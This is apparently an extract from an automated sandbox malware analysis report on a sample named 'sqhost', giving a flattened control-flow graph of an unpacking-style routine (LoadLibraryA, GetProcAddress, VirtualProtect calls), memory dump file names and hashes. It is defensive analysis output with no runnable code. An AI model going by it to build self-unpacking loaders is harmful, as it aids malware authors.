              control_flow_graph 0 14128d5a0-14128d5a3 1 14128d5ad-14128d5b1 0->1 2 14128d5bd 1->2 3 14128d5b3-14128d5bb 1->3 4 14128d5bf-14128d5c2 2->4 5 14128d5a5-14128d5aa 2->5 3->2 6 14128d5cb-14128d5d2 4->6 5->1 8 14128d5de 6->8 9 14128d5d4-14128d5dc 6->9 10 14128d5e0-14128d5e3 8->10 11 14128d5c4-14128d5c9 8->11 9->8 12 14128d5fe-14128d600 10->12 13 14128d5e5-14128d5f3 10->13 11->6 14 14128d60a 12->14 15 14128d602-14128d608 12->15 17 14128d64d-14128d668 13->17 18 14128d5f5-14128d5fa 13->18 20 14128d634-14128d637 14->20 21 14128d60c-14128d610 14->21 15->14 22 14128d699-14128d69c 17->22 19 14128d5fc 18->19 18->20 19->21 31 14128d639-14128d648 call 14128d562 20->31 23 14128d61a 21->23 24 14128d612-14128d618 21->24 25 14128d69e-14128d69f 22->25 26 14128d6a1-14128d6a7 22->26 23->20 28 14128d61c-14128d623 23->28 24->23 30 14128d680-14128d684 25->30 27 14128d6ae-14128d6b2 26->27 32 14128d70a-14128d75d VirtualProtect * 2 27->32 33 14128d6b4-14128d6cc LoadLibraryA 27->33 45 14128d62d 28->45 46 14128d625-14128d62b 28->46 34 14128d66a-14128d66d 30->34 35 14128d686-14128d689 30->35 31->1 40 14128d762-14128d767 32->40 37 14128d6ce-14128d6d5 33->37 34->26 38 14128d66f 34->38 35->26 41 14128d68b-14128d68f 35->41 37->27 43 14128d6d7 37->43 44 14128d670-14128d674 38->44 40->40 47 14128d769 40->47 41->44 48 14128d691-14128d698 41->48 49 14128d6d9-14128d6e1 43->49 50 14128d6e3-14128d6eb 43->50 44->30 51 14128d676-14128d678 44->51 45->28 52 14128d62f-14128d632 45->52 46->45 48->22 53 14128d6ed-14128d6f9 GetProcAddress 49->53 50->53 51->30 54 14128d67a-14128d67e 51->54 52->31 55 14128d6fb-14128d702 53->55 56 14128d704 ExitProcess 53->56 54->30 54->35 55->37
              APIs
              Memory Dump Source
              • Source File: 0000001D.00000002.468568862.000000014128D000.00000080.00020000.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 0000001D.00000002.468350642.0000000140000000.00000002.00020000.sdmp Download File
              • Associated: 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp Download File
              • Associated: 0000001D.00000002.468398090.000000014004B000.00000040.00020000.sdmp Download File
              • Associated: 0000001D.00000002.468405804.000000014004F000.00000040.00020000.sdmp Download File
              • Associated: 0000001D.00000002.468491661.0000000140BD1000.00000040.00020000.sdmp Download File
              • Associated: 0000001D.00000002.468536934.000000014127F000.00000040.00020000.sdmp Download File
              • Associated: 0000001D.00000002.468548091.0000000141281000.00000040.00020000.sdmp Download File
              • Associated: 0000001D.00000002.468563658.000000014128C000.00000040.00020000.sdmp Download File
              • Associated: 0000001D.00000002.468573306.000000014128E000.00000004.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_140000000_sqhost.jbxd
              Yara matches
              Similarity
              • API ID: ProtectVirtual$AddressLibraryLoadProc
              • String ID:
              • API String ID: 3300690313-0
              • Opcode ID: 224ad11c7606ebcab93525a208355d4f630ab1f4d01cea70e03ccfacad51b071
              • Instruction ID: 2eac8e8e49a5c6f9566bb731fc5f875140e309695ddc069fdeea8b5f34baf3bf
              • Opcode Fuzzy Hash: 224ad11c7606ebcab93525a208355d4f630ab1f4d01cea70e03ccfacad51b071
              • Instruction Fuzzy Hash: 85514832B5117D6AFA245AA4BC84BE8565193053BCF784321EFBDC33E5DAD888DE8210
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions